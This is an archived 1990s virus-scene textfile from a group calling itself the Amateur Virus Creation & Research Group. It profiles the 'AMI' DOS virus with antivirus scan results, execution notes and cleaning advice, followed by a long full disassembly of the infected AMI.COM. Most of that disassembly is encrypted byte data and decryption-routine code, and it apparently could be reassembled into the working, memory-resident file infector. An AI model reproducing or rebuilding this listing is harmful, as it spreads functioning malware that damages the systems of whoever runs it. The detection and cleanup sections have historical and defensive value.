💾 Archived View for spam.works › mirrors › textfiles › virus › avcr-01.005 captured on 2023-06-16 at 21:01:04.

View Raw

More Information

-=-=-=-=-=-=-

		???????     ?        ?  ?????????  ? ???????? 
	       ?       ?    ?        ?  ?          ???     ??
	      ?         ?   ?        ?  ?          ?       ??
	      ???????????   ?        ?  ?          ?
	      ?         ?   ?        ?  ?          ?
	      ?         ?    ?      ?   ?          ?
	      ?         ?     ??????    ?????????  ?
       
       
	
    ???   ???    ????    ???????    ????    ????????  ?  ?    ?  ???????
    ?  ???  ?   ?    ?   ?         ?    ?        ??   ?  ??   ?  ?
    ?       ?  ?      ?  ?  ????  ?      ?     ??     ?  ? ?  ?  ?????
    ?       ?  ????????  ?    ??  ????????   ??       ?  ?  ? ?  ?
    ?       ?  ?      ?  ???????  ?      ?  ????????  ?  ?   ??  ???????
       
       
       Distributed By Amateur Virus Creation & Research Group (AVCR)
			   Researched By MAS
?????????????????????????????????????????????????????????????????????????????
Name:                        The AMI Virus
?????????????????????????????????????????????????????????????????????????????
Alias: NONE
?????????????????????????????????????????????????????????????????????????????
Type of Code:  Unknown, but probably memory resident.
?????????????????????????????????????????????????????????????????????????????
Antivirus Detection: 
(1)
ThunderByte Anti Virus (TBAV) reported AMI.COM as: "probably infected by an 
unknown virus.
No checksum / recovery information (Anti-Vir.Dat) available.
Suspicious file access.  Might be able to infect a file.
Suspicious Memory Allocation.  The program uses a non-standard
way to search for, and/or allocate memory.
Found a code decryption routine or debugger trap.  This is common
for viruses but also for some copy-protected software.
The program traps the loading of software.  Might be a
virus that intercepts program load to infect the software.
Memory resident code.  The program might stay resident in memory.
Garbage instructions.  Contains code that seems to have no purpose
other than encryption or avoiding recognition by virus scanners.
Undocumented interrupt/DOS call.  The program might be just tricky
but can also be a virus using a non-standard way to detect itself.
EXE/COM determination.  The program tries to check whether a file
is a COM or EXE file.  Viruses need to do this to infect a program.
Found code that can be used to overwrite/move a program in memory.
Found instructions which require a 80186 processor or above.
Encountered instructions which are not likely to be generated by
an assembler, but by some code generator like a polymorphic virus."

(2)
Frisk Software's F-Protect (F-PROT) reported AMI.COM as:
"C:\AMI\AMI.COM seems to be infected with a virus.
Please contact Frisk Software International to check if this is a known
false alarm or send us a copy for analysis."

(3)
McAfee Softwares Anti Virus (SCAN.EXE) did not detect the AMI virus.

(4)
MicroSoft Anti Virus (MSAV.EXE) did not detect the AMI virus.
?????????????????????????????????????????????????????????????????????????????
Execution Results:
	This virus is very stealthy, for no files are changed in size date or 
time stamp.  Memory size does not change.  The virus's size, date, and time 
before execution were:

 NAME           SIZE            DATE            TIME
AMI.COM         1703          12-16-93          2:40p

	And after execution they remained unchanged.  The only noticible
difference between before execution and after execution is the change in
its code.  Below is a comparison of the AMI virus before and after execution,
the top is before execution and the bottom is after execution.
_____________________________________________________________________________
; FILE CREATED BY FILE COMPARE,
; DEVELOPED BY:
; MICRO PROFESSOR SOFTWARE,
; ALONG WITH AMATEUR VIRUS CREATION & RESEARCH GROUP.


;----------------------------------------------------------------------------
		mov     SI,Word Ptr var1_100    ; [602D:0100] = 0
		mov     SI,Word Ptr var1_100    ; [6342:0100] = 0
;----------------------------------------------------------------------------
		xor     Word Ptr var1_100,SI    ; [602D:0100] = 0
		xor     Word Ptr var1_100,SI    ; [6342:0100] = 0
;----------------------------------------------------------------------------
		add     DL,Byte Ptr var1_2ee    ; [602D:02EE] = 0F27Fh
		add     DL,Byte Ptr var1_2ee    ; [6342:02EE] = 0F27Fh
;----------------------------------------------------------------------------
		mov     AL,Byte Ptr DS:data_8ee2; [602D:8EE2] = 0
		mov     AL,Byte Ptr DS:data_8ee2; [6342:8EE2] = 6399h
;----------------------------------------------------------------------------
		mov     AL,Byte Ptr DS:data_792e; [602D:792E] = 0
		mov     AL,Byte Ptr DS:data_792e; [6342:792E] = 69A9h
;----------------------------------------------------------------------------
		sbb     Byte Ptr DS:data_461f,BL; [602D:461F] = 0  Subtract with borrow
		sbb     Byte Ptr DS:data_461f,BL; [6342:461F] = 1A1Ah  Subtract with borrow
;----------------------------------------------------------------------------
		mov     AX,Word Ptr DS:data_5f12; [602D:5F12] = 0
		mov     AX,Word Ptr DS:data_5f12; [6342:5F12] = 53F8h
;----------------------------------------------------------------------------
		db      16h, 0A7h, 58h, 63h
		db      16h, 0A7h
;----------------------------------------------------------------------------
CODE_SEG_1      ends
var1_7a5        db      58h, 63h
;----------------------------------------------------------------------------

CODE_SEG_1      ends
;----------------------------------------------------------------------------
		end     start

;----------------------------------------------------------------------------

		end     start
;----------------------------------------------------------------------------
; END OF FIRST FILE, EXTRA CODE IS FROM SECOND FILE

?????????????????????????????????????????????????????????????????????????????
Cleaning Recommendations:
	Remove from memory and delete infected files.
?????????????????????????????????????????????????????????????????????????????
Researcher's Notes:
	The AMI virus is very stealthy, for there are no ways, other than
a virus detector, to notice the virus.  When the virus is first run there
is no way to realize that it has been run, for there is no character
displaying, speaker noise, etc.
?????????????????????????????????????????????????????????????????????????????

-----------------------------------------------------------------------------
	     Disassembly of the AMI Virus BEFORE Execution
-----------------------------------------------------------------------------
		PAGE    60,132


data_10be       =       10BEh
data_16d6       =       16D6h
data_2041       =       2041h
data_2b9f       =       2B9Fh
data_2ee0       =       2EE0h
data_461f       =       461Fh
data_50ee       =       50EEh
data_5d91       =       5D91h
data_5f12       =       5F12h
data_681b       =       681Bh
data_7162       =       7162h
data_732e       =       732Eh
data_7606       =       7606h
data_792e       =       792Eh
data_8ee2       =       8EE2h
data_a1ed       =       0A1EDh
data_aea5       =       0AEA5h
data_b400       =       0B400h
data_d8db       =       0D8DBh
data_ee10       =       0EE10h
data_eeb8       =       0EEB8h
data_faa6       =       0FAA6h


;?????????? CODE_SEG_1  ????????????????????????????????????????????????????????

CODE_SEG_1      segment para public
		assume  CS:CODE_SEG_1, DS:CODE_SEG_1, SS:CODE_SEG_1, ES:CODE_SEG_1


		org     100h


;???????????????????????????????????????????????????????????????????????????????
;?
;?              ENTRY POINT
;?
;???????????????????????????????????????????????????????????????????????????????


;???????????????????????????????????????????????????????????????????????????????
;?
;?              PROCEDURE proc_start
;?
;???????????????????????????????????????????????????????????????????????????????

proc_start      proc    far
start:          ; N-Ref=0
		add     Byte Ptr [BX+SI],AL     
		add     DL,BH                   
		nop                             ; No operation
		nop                             ; No operation
		call    near ptr proc_2         
proc_start      endp



;???????????????????????????????????????????????????????????????????????????????
;?
;?              PROCEDURE proc_2
;?
;???????????????????????????????????????????????????????????????????????????????

proc_2          proc    far
		pop     BX                      
		sub     BX,offset var1_131      
		mov     SI,Word Ptr var1_100    ; [602D:0100] = 0
		xor     Word Ptr var1_100,SI    ; [602D:0100] = 0
		lea     DI,Word Ptr var1_14d[BX]; Load effective address
		mov     SI,682h                 
		xor     Word Ptr [DI],DI        
		xor     Word Ptr [DI],SI        
		inc     DI                      
		dec     SI                      
		jne     loc_notfound            ; Jump if not equal ( != )
		aaa                             ; ASCII adjust for addition
		xor     Byte Ptr [BP+DI+1Fh],CL 

		dw      50C0h, 0C951h
var1_12d        db      'XPP'
		db      8Dh
var1_131        db      '`@@@'
		db      13h, 0BFh, 40h, 0A0h, 4Ch, 53h
		db      0C3h, 57h, 15h, 44h, 18h
var1_140        db      '"  '
		db      0
var1_144        db      20h, 9, 3Ah, 0DBh, 7Eh, 79h
		db      14h, 0CAh, 16h
var1_14d        dw      1110h, 10h, 0E9h
		db      5 dup (0)
		dw      1810h
		db      4 dup (10h)
		db      32h, 11h, 3, 26h, 3
var1_163        db      '&  ! '
		db      0Ch, 0BFh
		db      ']PPPPB@A@@TTTT'
		db      0B8h, 50h, 50h, 0Bh, 0D1h, 0BBh
		db      0F3h, 51h, 8Eh, 2Ch, 2Fh, 0F4h
		db      0A1h, 8Eh, 29h, 27h, 0C6h, 91h
		db      0BEh, 1Bh, 17h, 0C8h, 91h, 33h
		db      80h, 81h, 0AEh, 0Ah, 7, 0DAh
		db      81h, 22h, 92h, 91h, 0C3h, 24h
		db      0A0h, 5Dh, 0B1h, 0CBh, 9Ch, 0A2h
		db      0D2h, 0B1h, 18h, 5Fh, 0EBh, 93h
		db      0AFh, 60h, 0A5h, 9Eh, 72h, 6Eh
		db      1Bh, 7, 16h
var1_1b1        db      '6L1U'
		db      0B8h
var1_1b6        db      ']D}'
		db      0D8h, 0D4h, 5, 52h, 7Dh, 0ACh
		db      0FCh
var1_1c0        db      71h, 22h, 70h
loc_1:          ; N-Ref=0
		wait                            ; Wait for interrupt
		add     DL,Byte Ptr var1_2ee    ; [602D:02EE] = 0F27Fh
		cbw                             ; Convert byte to word
		ror     Byte Ptr [BX+SI+3Dh],1  ; Rotate right
		call    far ptr proc_1          
		pop     Word Ptr var1_260[SI]   
		mov     BX,0FCF5h               
		and     CH,AH                   
		adc     AX,9D0Dh                ; ADD with carry
		retf                            ; Return FAR
proc_2          endp



		db      92h
var1_1df        db      '.bnV/'
		db      0A2h
var1_1e5        db      '^!j'
		db      7Fh
var1_1e9        db      '&VLT'
		db      0B8h, 95h, 0C3h, 5Ch
loc_2:          ; N-Ref=1
		inc     SP                      
		rcl     BX,CL                   ; Rotate left through carry
		rcl     BX,CL                   ; Rotate left through carry
		rcl     BX,CL                   ; Rotate left through carry
		retn                            

		db      5 dup (0C3h)
		dw      28EBh, 2CA3h, 0ED6Dh, 652Eh
		dw      2B8Eh, 86A6h, 0B690h, 0A619h
		dw      9091h, 0BA6h, 8396h, 0A680h
		dw      8323h, 0B690h, 9656h, 9090h
		dw      0BBDDh, 0EA70h, 0A3E5h, 0E548h
		dw      652Eh, 0E403h, 0DB00h, 9D8Dh
		dw      0B71h, 0BF73h, 5746h, 0CD17h
		dw      8EFFh, 0DB57h, 0E9A7h, 56F5h
		dw      0A3ADh, 2684h, 0AFADh
var1_244        db      'P"q'
		db      0EBh, 3Eh, 9Ch, 9Fh, 44h, 11h
		db      9Dh, 9Fh, 3Ah, 1, 0F3h, 0A4h
		db      2Eh, 8Ch, 0Eh, 36h, 0, 5Dh
		db      9Eh, 0D5h, 36h, 99h, 6, 13h
		db      10h
var1_260        dw      0E606h
var1_262        db      '&  z'
		db      6, 0ACh
var1_268        db      '^QP'
		db      15h, 0DEh
loc_3:          ; N-Ref=0
		xchg    BP,AX                   
		dec     SI                      
		push    DI                      
		dec     SI                      
		pop     DI                      
		int     0F7h                    

		dw      416Ah, 40FFh, 0E951h, 56F5h
		dw      0A3ACh, 56F4h, 0A62Dh, 0A224h
		dw      6BF0h, 678Eh, 0BC96h, 9090h
		dw      0BE90h, 9E1Ch, 8096h, 0D9Eh
		dw      9C96h, 8E83h, 288Fh, 0B5B1h
		dw      0B15Dh, 248Fh, 1ABAh, 0A020h
		dw      816Dh
var1_2a6        db      'HSQ'
		db      0E5h, 7Bh, 9Ch, 70h, 0D0h, 0A8h
		db      95h
var1_2b0        db      'F6$5k'
		db      0C0h, 0B8h, 0FDh, 56h, 24h, 0Ch
		db      4Fh, 0E9h, 79h, 64h, 9Ch, 0
		db      0Fh, 0A8h, 3Fh, 1Ah, 20h, 0Fh
		db      0ADh, 17h, 2Ch, 10h, 0A9h, 39h
		db      34h, 0ABh, 33h, 6, 0Fh, 1Eh
		db      0CCh, 20h, 1Eh, 2Fh, 81h, 1Fh
		db      46h, 10h, 19h, 0FAh, 17h, 81h
		db      91h, 0DFh, 2Bh, 53h, 15h, 0C9h
		db      5Ch, 23h, 99h, 49h, 44h, 0B9h
		db      0D5h, 50h, 11h
var1_2ee        db      7Fh, 0F2h, 1Fh, 40h, 6Fh, 0E2h
var1_2f4        db      '!@o'
		db      86h
var1_2f8        db      'W5PPQ'
		db      0E9h
var1_2fe        db      'Mdl'
		db      81h, 8Eh, 29h, 0BEh, 93h, 0A1h
		db      8Eh, 1Ch, 96h, 0A5h, 91h, 8Eh
		db      28h, 8Ch, 0B5h, 3Ah, 3Dh, 86h
		db      8Eh, 9Fh, 4Dh, 0A1h, 9Fh
		db      '+Foy'
		db      7, 6Eh, 10h, 6Ch, 0EBh, 0D4h
		db      0B0h, 8Eh, 5Fh, 8Eh, 97h, 0A1h
		db      0EFh, 18h, 4, 7Eh, 94h
var1_32d        db      'VgQ'
		db      0CCh, 8Ah, 8Fh, 7Ch, 0BFh, 34h
		db      0B1h
var1_337        db      '|P%'
		db      0B8h, 0CCh, 0, 3, 1, 2
var1_340        db      'vwu&>'
		db      0Eh, 0A9h, 36h, 57h, 11h, 3Eh
		db      9Ch, 0Eh, 59h, 11h, 1Eh, 7
		db      0B8h, 0, 3Dh, 0CDh
var1_355        db      '!rV'
		db      9Bh, 0C8h, 0A8h, 10h, 47h, 0DDh
		db      31h, 3Eh, 0A9h
var1_361        db      '6c!'
		db      0Eh, 0A9h
var1_366        db      '.eQ'
		db      0E4h
loc_4:          ; N-Ref=0

var1_36a        db      'o^O'
		db      0EAh, 7Eh, 51h, 0F9h, 43h, 40h
		db      8Dh
var1_374        db      'a2w{'
		db      91h, 25h, 63h, 0E8h, 52h, 12h
		db      63h, 99h, 93h, 72h, 6Dh, 81h
		db      8Eh, 3, 0EBh, 0A1h, 0BEh, 19h
		db      86h, 0DDh, 91h, 24h, 0AEh, 5Dh
		db      0A1h, 0AEh, 1, 0BEh, 0AEh, 81h
		db      0CDh, 0DAh, 0E5h, 93h, 79h, 57h
		db      90h, 0BEh, 13h, 0AEh, 0EDh, 0A1h
		db      0A0h, 0D7h, 0A9h, 8Eh, 21h, 9Eh
		db      1Bh, 56h, 6Ch, 0AEh, 21h, 54h
		db      0BEh, 0E4h, 47h, 69h, 0C7h
var1_3b3        db      'yiF'
		db      0AEh
var1_3b7        db      32h, 59h
loc_5:          ; N-Ref=0
		jns     loc_notfound            ; Jump if no sign ( >= 0)
		sbb     AL,56h                  ; 'V'  Subtract with borrow
		push    DX                      
		push    CS                      
		scasb                           ; Scan DS:SI for byte in AL
		or      Word Ptr [SI],BX        
		and     Word Ptr [BX+SI],CX     

		dw      5326h, 9FC0h, 5417h, 0D239h
		dw      5001h, 0DA16h, 7526h, 29DCh
		dw      98Eh, 646h, 0E697h, 0E137h
		dw      30D6h, 1E63h, 269Fh, 1464h
		dw      0EAEEh, 5506h, 0EF92h, 6A55h
		db      9Ah, 76h, 25h, 0E9h, 0CCh, 9Fh
		db      0FFh
loc_6:          ; N-Ref=1
		inc     BP                      
		add     AX,8E74h                
		je      loc_notfound            ; Jump if equal ( = )
		call    far ptr loc_notfound    
		and     AL,4Fh                  ; 'O'
		pop     DS                      
		mov     AL,Byte Ptr DS:data_8ee2; [602D:8EE2] = 0
		sub     BP,Word Ptr [BP-5E13h]  
		mov     SI,861Bh                
		esc     Byte Ptr [BP+5D91h]     
		mov     CL,24h                  ; '




		dw      0B3C0h, 4D49h, 6BA1h, 10A1h
		dw      9028h, 0A3D2h, 0A359h, 5D42h
		dw      0D281h, 8EB5h, 0EB01h, 0A5A1h
		dw      0AFAEh, 0F37Eh, 5100h, 10E4h
		dw      0FFAh, 0F941h, 4043h, 618Dh
		dw      51E8h, 7E07h, 46DBh, 5113h
		dw      0AB0Eh
var1_442        db      '.e!'
		db      0EDh, 1, 94h, 2Eh, 0DDh, 31h
		db      3Eh, 9Bh, 1Eh, 51h, 11h, 0F6h
		db      0C1h, 7, 75h, 5, 0F6h, 0C1h
		db      20h, 65h, 1Ah, 0A8h, 11h, 53h
		db      3Eh, 0D5h, 6, 67h, 21h, 0EDh
		db      1
var1_464        db      '?''}'
		db      7Fh, 0Eh, 0Ah, 9, 0Bh, 8
		db      0CDh, 0B9h, 0E2h, 0BEh
var1_471        db      '^N_'
		db      13h, 11h, 12h, 10h, 0E9h, 57h
		db      50h, 0EBh, 24h, 51h, 0AFh, 67h
		db      2Bh, 0E7h, 5Eh, 0B1h, 0A7h, 0EBh
		db      0EBh, 42h, 67h, 0C8h, 81h, 97h
		db      1Bh, 87h, 0C8h, 9Bh, 40h, 0F4h
		db      82h, 77h, 62h, 0Bh, 42h, 0DAh
		db      0C9h, 0CBh, 8Fh, 53h, 8Eh, 96h
		db      0C6h, 0C7h, 0F1h
loc_7:          ; N-Ref=0
		scasb                           ; Scan DS:SI for byte in AL
		cmpsw                           ; Cmp word at DS:SI to ES:DI
		sbb     AX,SP                   ; Subtract with borrow
		mov     AL,Byte Ptr DS:data_792e; [602D:792E] = 0
		out     DX,AX                   ; Output to port [DX] from AX
		aaa                             ; ASCII adjust for addition
		push    AX                      
		out     DX,AX                   ; Output to port [DX] from AX
		cmp     AX,0E851h               
		pop     CX                      
		inc     CX                      
		mov     BP,0E4B2h               
		sbb     Byte Ptr DS:data_461f,BL; [602D:461F] = 0  Subtract with borrow
		dec     SI                      
		xchg    DX,AX                   
		pop     ES                      

;???????????????????????????????????????????????????????????????????????????????
		assume  ES:nothing
;???????????????????????????????????????????????????????????????????????????????

		dec     DI                      
		add     BX,BX                   
		xchg    DI,AX                   
		cmpsw                           ; Cmp word at DS:SI to ES:DI
		pop     ES                      
		jnb     loc_notfound            ; Jump if not below ( >= )
		xchg    DI,AX                   
		and     Word Ptr [BP+SI],SP     
		jcxz    loc_notfound            ; Jump if CX = 0

		dw      12F1h, 4B17h, 9A10h, 0E7E1h
		dw      5507h, 0FE00h, 1F8Fh, 59h
		dw      365h, 0CBABh, 0EB12h, 0B9FDh
var1_4e0        db      ')T('
		db      89h, 20h, 54h, 0D6h, 0CDh, 0F9h
		db      50h, 25h, 0AAh, 0FCh, 0AAh, 0Bh
		db      4Eh, 1Fh, 82h, 16h, 47h, 13h
		db      12h, 0CAh, 99h, 0DBh, 97h, 0A7h
		db      77h, 3, 50h, 0E7h, 51h, 0A2h
		db      'bq@'
		db      0A3h, 0A6h, 0FAh, 0A1h, 1Bh, 68h
		db      66h, 96h, 0C4h, 91h, 6Fh, 1Eh
		db      86h, 0D8h, 81h, 0F4h, 92h, 3Ah
		db      5Ah, 83h
var1_518        db      'j|8'
		db      98h, 0E5h, 99h, 38h, 91h, 0D5h
		db      57h, 4Ch, 8, 0A1h, 0D4h, 5Bh
		db      2Bh, 93h, 0FAh, 0ABh, 0Bh, 0Ah
		db      57h, 0Fh, 93h, 11h, 11h, 0CBh
		db      4Eh, 1Ch, 41h, 0A2h, 0BEh, 9
		db      0B2h, 0A6h
loc_8:          ; N-Ref=0
		or      Word Ptr data_b400[BP+DI],DX    
		xor     Word Ptr [SI],DX        
		and     AL,Byte Ptr [SI]        
		esc     Byte Ptr [SI]           
		mov     Byte Ptr [BX+DI+78h],0E3h       
		sub     AL,10h                  

		dw      1A64h
var1_54c        db      ',0d'
		db      16h, 3Ch, 0FFh, 74h, 2, 0F8h
		db      0C3h, 0F9h, 0C3h, 2Ch, 0A0h, 62h
		db      16h, 2Ch, 0CFh, 67h, 12h, 0D9h
		db      0E3h, 0D8h, 0E3h, 3Eh, 98h, 60h
		db      20h, 0DEh, 88h, 0ABh, 0F1h
var1_56c        db      '<PkV,@4'
		db      0BAh, 73h, 89h, 0E1h, 2Ch, 50h
		db      11h, 24h
var1_57b        db      'EkV<P'
		db      0D4h, 57h, 0BFh, 2Bh, 61h, 93h
		db      72h, 19h, 9Fh, 90h, 67h, 61h
		db      0BEh, 33h, 0CCh, 91h, 43h, 0C9h
var1_592        db      'knF'
		db      86h, 0D3h, 81h, 88h, 8Eh, 28h
		db      0D0h, 90h, 1Eh, 48h, 31h, 0EEh
		db      0A0h, 0BFh, 3
loc_9:          ; N-Ref=0
		cli                             ; Disable interrupts
		mov     AX,Word Ptr DS:data_5f12; [602D:5F12] = 0
		call    near ptr proc_3         
		in      AL,53h                  ; 'S'
		push    BP                      
		push    ES                      
		sahf                            ; Store AH into FLAGS
		push    BX                      
		push    DS                      
		inc     SP                      
		retn                            

		dw      0BCB9h, 4737h, 45DBh, 5200h
		dw      5CE7h, 439Eh, 5ABh, 2271h
		db      0E5h
var1_5c5        db      '%w"'
		db      13h, 0D4h, 15h, 4Bh, 12h, 13h
		db      0A3h, 2Fh, 4
var1_5d1        db      'w5q'
		db      0, 0EAh, 0E3h, 3, 0D4h, 15h
		db      4Bh, 12h, 13h, 0ABh, 2Fh, 10h
		db      54h, 4, 1Fh, 21h, 51h, 0
		db      0E5h, 25h, 7, 52h, 52h, 0F3h
		db      0, 52h, 0ADh, 93h, 0B5h, 65h
var1_5f2        db      11h, 42h, 0E0h, 21h, 42h, 0E2h
var1_5f8        db      '7RhU1R%P'
		db      2, 0C2h, 0A1h, 48h, 0CBh, 5Eh
		db      0E0h, 2Bh, 60h, 0A3h, 6Fh, 0D7h
		db      31h, 0F2h, 91h, 41h, 60h, 0BBh
		db      78h, 0F6h, 83h, 69h, 20h, 80h
		db      10h, 9Eh, 0C7h, 91h, 92h, 30h
		db      0C2h, 91h, 14h, 0A0h, 48h, 0ECh
var1_624        db      '^*p'
		db      0, 3, 51h, 0E4h, 50h, 0B8h
		db      12h, 0AEh, 0DAh, 0B0h, 0A8h, 0C6h
loc_10:         ; N-Ref=0
		mov     SI,51A8h                
		mov     DI,8232h                
		mov     AX,0AF4Ch               
		and     BL,Byte Ptr var1_5f2[DI]
		and     Word Ptr data_7606[BX+SI],BP    
		and     Word Ptr data_732e[BP+SI],BP    
		adc     Word Ptr data_ee10[DI],SP       ; ADD with carry

		db      0D6h
var1_64d        db      '*&C'
		db      1, 77h, 52h, 0E8h, 64h, 0FEh
var1_656        db      ':&F'
		db      11h, 65h, 59h, 0F8h, 0F9h, 0EEh
		db      62h, 8, 0C8h, 0D4h, 0DEh, 52h
		db      1Fh, 0DEh, 0E6h, 6Ah, 66h, 3
var1_66b        db      'Q''g'
		db      0B8h, 19h, 0BEh, 7Ah, 66h, 16h
		db      'A5n'
		db      0A8h, 9Eh, 0AEh, 23h, 0B5h, 0B8h
		db      0EEh, 0AEh, 0AEh, 6Eh, 48h, 96h
		db      5Eh, 2, 0F5h, 0A1h, 5Eh, 56h
		db      10h, 0B6h, 0C7h, 91h
var1_68d        db      'mn^0'
		db      0A0h, 68h, 0DDh
var1_694        db      '~~F '
		db      0C5h, 91h, 78h, 0C5h, 6Eh, 73h
		db      94h
var1_69f        db      'x.^'
		db      0E9h, 4Bh, 6
loc_11:         ; N-Ref=0
		push    SI                      
		cmpsb                           ; Cmp byte at DS:SI to ES:DI
		not     Word Ptr [BX+DI+53h]    
		and     AX,0B852h               
		or      AX,0B9AEh               
		retf    0FBFh                   ; Return FAR

		dw      4235h, 10A8h, 0B5BEh, 7530h
		dw      0B7ADh, 9230h, 0D77Fh
var1_6c1        db      '''v (Ty'
		db      0Fh, 91h, 1Fh, 46h, 10h, 10h
		db      3Fh, 0EEh, 1Fh, 5Fh, 0, 74h
		db      44h, 1Fh, 7, 0Fh, 1Eh, 1Fh
		db      16h
		db      'AB@CGFt'
		db      91h, 1, 0C7h, 1, 80h
		db      41h, 20h
var1_6e8        db      'liU"R'
		db      0E9h, 69h, 55h, 0A9h, 3Fh, 0BCh
		db      1, 0E2h, 1Fh, 40h, 0E2h, 31h
		db      50h, 0B9h, 0C6h, 0AFh, 0E9h
var1_6fe        db      'RQI'
		db      0CEh, 5Dh, 0E0h, 57h, 86h, 0C4h
		db      0A1h, 0E3h, 93h
var1_70a        db      '(oo3'
		db      0F4h, 91h, 0DDh, 0DFh, 0DEh, 0DAh
loc_12:         ; N-Ref=0
		esc     Byte Ptr [BX+DI-25h]    
		esc     Byte Ptr [BX+DI-79h]    

		dw      0B610h, 91C7h, 0BE6Eh, 8E5Fh
		dw      0A193h, 568Eh, 0F7A6h
var1_728        db      'QX$M'
		db      0, 1, 2, 0E4h, 6Ah, 8Dh
		db      61h, 0C1h, 0B9h, 84h
var1_736        db      'G2]''U'
		db      0D0h, 0AEh
var1_73d        db      'Z"V'
		db      0Eh, 0A0h, 6, 77h, 21h, 0D7h
var1_746        db      'zyH>'
		db      0EFh, 3Eh, 2Bh, 11h, 16h, 43h
		db      0B4h, 48h, 0BBh, 6Bh, 0, 0CDh
var1_756        db      '![c'
		db      13h, 0E9h, 17h, 0D3h, 3Eh, 0D6h
		db      16h
		db      ' !!'
		db      0AEh, 0E0h, 2Eh, 3Fh, 13h, 0AFh
		db      0EEh, 50h, 51h, 0E9h, 0F5h, 56h
		db      0ACh, 0B3h, 0E4h, 0FFh, 63h, 40h
		db      0FEh
var1_776        db      'cASf'
		db      1Bh, 51h, 0E9h, 0D2h, 56h, 76h
		db      91h, 95h, 86h, 91h, 0ADh, 0E7h
		db      0E6h, 42h, 66h, 1Eh, 48h, 24h
		db      0D0h, 0A3h
var1_78e        db      'B)%'
		db      86h, 4Dh, 0A1h, 1Ch, 0D0h, 34h
		db      0C9h, 5Dh, 0B1h, 0C8h, 0Dh, 9Eh
		db      8Fh, 0E2h, 2Ah, 9Bh, 61h, 0D5h
		db      16h, 0A7h, 58h, 63h
CODE_SEG_1      ends



		end     start


?????????????????????????????????????????????????????????????????????????????